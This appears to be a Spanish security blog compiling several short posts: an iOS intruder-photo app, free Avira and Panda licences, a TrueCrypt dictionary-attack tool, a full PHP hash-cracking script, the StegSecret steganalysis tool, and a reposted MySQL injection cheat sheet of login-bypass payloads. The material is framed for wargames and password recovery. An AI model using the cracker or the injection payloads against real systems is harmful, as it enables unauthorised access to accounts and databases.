ilockOut añade otro nivel de seguridad a los dispositivos con iOS, iPod Touch y iPhone. Esta aplicación está diseñada especialmente para quienes tienen la costumbre de dejar su dispositivo en cualquier lugar y este queda susceptible a que personas puedan manipularlo sin autorización. Muy recomendada de igual forma también para quienes son más cuidadosos con sus gadgets, pues nadie está a salvo de un robo o personas curiosas.

Lo que hace la aplicación es, una vez, la persona que tiene el dispositivo en sus manos intenta desbloquearlo, contará con 15, 30 o 45 segundos (según lo hayamos configurado) para introducir el código de desbloqueo correcto y desbloquear el dispositivo, si la persona que intenta acceder ingresa un código equivocado varias veces no sucederá nada, pero si no ingresa el código correcto antes de que se termine el tiempo que se ha pre configurado para ello, ilockOut se encargará de tomar una foto con la cámara frontal del dispositivo de forma automática y enviarla de inmediato por correo electrónico a la dirección que hayamos configurado.

Como el sistema requiere usar la cámara frontal, esta aplicación solo podrá ser instalada en los dispositivos con iOS que cuenten con dicha cámara. La aplicación se encuentra disponible en el repositorio de ModMyi por medio de Cydia.

Estos dos antivirus están ofreciendo licencias de 180 días sin ningún costo, sin participar en ningún concurso, simplemente realizando un simple proceso.

Avira: Para acceder a una licencia de Avira Premium Security Suite de 180 días (6 Meses) se debe completar el formulario que se encuentra en esta pagina, Avira 180 Days, luego de completar este formulario vía e-mail recibirá la llave de licencia que le permitirán activar por 6 meses de forma totalmente legal su antivirus. Esta licencia permite acceder a actualizaciones y a la totalidad de sus funciones premium.

Panda: Para acceder a una licencia de Panda Antivirus Pro 2012 de 180 días, equivalente a cerca de 6 meses de uso, lo único que hay que hacer es, acceder a la fan page en facebook de Panda Security, dar en me gusta y seguir las instrucciones, esta licencia es valida para todas las funciones pro de Panda Antivirus, esta son algunas de ellas:

• Protección contra todo tipo de virus y Amenazas
• Inteligencia Colectiva
• Firewall Personal
• Panda USB Vaccine
• Teclado Virtual
• Panda Safe Browser
• Modo de Juegos
• Gestor de Red Domestica
• Panda Safe Cd
• Soporte Tecnico Via Web
• Actualizaciones
• SOS virus

Antes que nada debo presentarles TrueCrypt para quienes no lo conozcan, es un Software que nos permite encriptar archivos haciendo uso de diferentes algoritmos de cifrado. Lo que más me gustó de este aplicativo es que nos permite crear volúmenes virtuales (como si se tratase de otro disco más en nuestro computador) que en realidad no es más que es un archivo con extensión .tc el cual después de poner la contraseña correcta se “monta” para poder ser usado y así es mucho más sencillo y rápido administrar los archivos del mismo.

En un reto que vi hace algún tiempo para un Wargame, había que realizar un ataque por diccionario a un volumen TrueCrypt y así fue que di con true.crypt.brute, que también puede ser útil en caso de olvidar la contraseña del .tc con archivos importantes. Eso si hay que tener en cuenta que se necesita un buen diccionario y que no es del todo efectivo el ataque, ya que como he visto en algunos casos de personas que usan 50 o más caracteres en su contraseña, haciendo imposible dar con ella usando un diccionario. Otro detalle es que el proceso es muy lento, hay que tener paciencia.

Descargar true.crypt.brute.

Últimamente resolviendo algunos retos me ha tocado crackear diferentes hash y aunque existen muchos programas para esa labor (como Cain) estos no ofrecen soporte para realizar fuerza bruta a algunos tipos de hash. Por esta razón hice PHPCracker, un sencillo script que permite realizar ataques por fuerza bruta y ataques por diccionario usando PHP.

<?php

if (defined('STDIN')) {
        if (count($argv) < 2) {
            echo "#########################################################################\n" .
            "#           PHPCracker UrbaN77 www.RedInfoCol.org  - www.BrianUR.info   #\n" .
            "#########################################################################\n" .
            "# Uso: php phpcracker.php [Modo] [Nombre del hash] [Hash] [Opciones]    #\n" .
            "# --------------------------------------------------------------------- #\n" .
            "# Modo: usa -b hacer un brute force o -d para un ataque por diccionario.#\n" .
            "# Nombre del hash: Por ejemplo md5, sha1 o cual sea el nombre.          #\n" .
            "# Hash: Hash a crackear.                                                #\n" .
            "# Opciones: Estas dependen del modo elegido.                            #\n" .
            "#  - Charset: min para minusculas, may para mayusculas   o all para las #\n" .
            "#             anteriores con numeros y simbolos (Solo para el modo -b). #\n" .
            "#  - Diccionario: nombre del fichero de tu wordlist (Solo para modo -d).#\n" .
            "#########################################################################";
            exit;
        }
        $modo = $argv[1];
        $tipoHash = $argv[2];
        $hash = $argv[3];

        function crackear($hash, $tipoHash, $charset) {
            if ($charset == "min") {
                $desde = 97;
                $hasta = 122;
            } elseif ($charset == "may") {
                $desde = 65;
                $hasta = 90;
            } elseif ($charset == "all") {
                $desde = 33;
                $hasta = 126;
            } else {
                echo "Necesitas especificar el Charset: min, may o all.";
                exit;
            }
			echo "Crackeando...\n";
            for ($i = $desde; $i <= $hasta; $i++) {
                for ($j = $desde; $j <= $hasta; $j++) {
                    for ($k = $desde; $k <= $hasta; $k++) {
                        for ($l = $desde; $l <= $hasta; $l++) {
                            $salida = hash($tipoHash, chr($i) . chr($j) . chr($k) . chr($l));
                            if ($hash == $salida) {
                                echo "Password encontrado: " . chr($i) . chr($j) . chr($k) . chr($l)."\n";
                                exit;
                            }
                        }
                    }
                }
            }
        }

        if ($modo == "-d") {
            $wordlist = $argv[4];
            if (file_exists($wordlist)) {
                $diccionario = file($wordlist);
				echo "Crackeando...\n";
                foreach ($diccionario as $rel) {
                    $salida = hash($tipoHash, $rel);
                    if ($salida == $hash) {
                        echo "El password es: " . $rel;
                        exit;
                    }
                }
            } else {
                echo "El archivo " . $wordlist . " no existe.";
                exit;
            }
        } elseif ($modo == "-b") {
            $charset = $argv[4];
            crackear($hash, $tipoHash, $charset);
        }
        echo "Password no encontrado :/ intenta probando con otro tipo de hash, otro charset o diccionario.";
} else {
    echo("Necesitas correr este script desde la consola.");
}
?>

StegSecret es una interesante herramienta para estegoanálisis de imágenes en busca de información oculta, comprobando diferentes tipos de técnicas comunes y patrones usados por programas como camouflage, inThePicture, inPlainView, steghide, dataStealth y entre otros más. Muy útil para wargames cuando necesitas saber rapidamente el tipo de tecnica de un reto de esteganografía antes de ponerte a comprobar manualmente.

Programas y técnicas detectadas

• camouflage V1.2.1, inThePicture v2, JPEGXv2.1.1, PGE (Pretty Good Envelope) v1.0, appendX v<=4, steganography v1.6.5, inPlainView, DataStash v1.5 y dataStealth v1.0.
• Programas basados en  técnicas EOF (End Of File).
• Suporta los formatos BMP, GIF y JPEG.
• Cuenta con una Base de Datos de Aplicaciones Esteganográficas “bdas v0.1″ con más de 40 tipos de técnicas esteganográficas.

En resumen una herramienta que no puede faltar en el repertorio.

Sitio web y descarga de StegSecret.

Los siguientes “trucos” para SQL Injection son una colección de una web llamada 0×000000.com que lamentablemente en la actualidad no esta disponible, los tenía guardados por ahí hace tiempo y quiero compartirlos con ustedes:

A collection of known and working SQL vectors. These vectors are designed and tested by me on my localhost. I kept the list clean and concise tested for all MySQL versions to date unless stated otherwise. This sheet is under constant development, please come back often. Note that most of these vectors can be used on SQL server or Oracle but mainly it is written and tested for MySQL only. What I give you here is basicly everything you ever need to know about MySQL injection. You have to construct the pieces yourself and probably need to know what they do in order to use them.

Basics

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Use inside login form:

1' OR 1=1--
1' OR '1' = '1
'
''
'or"='
') or ('a'='a
") or ("a"="a
hi" or "a"="a
or a=a--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a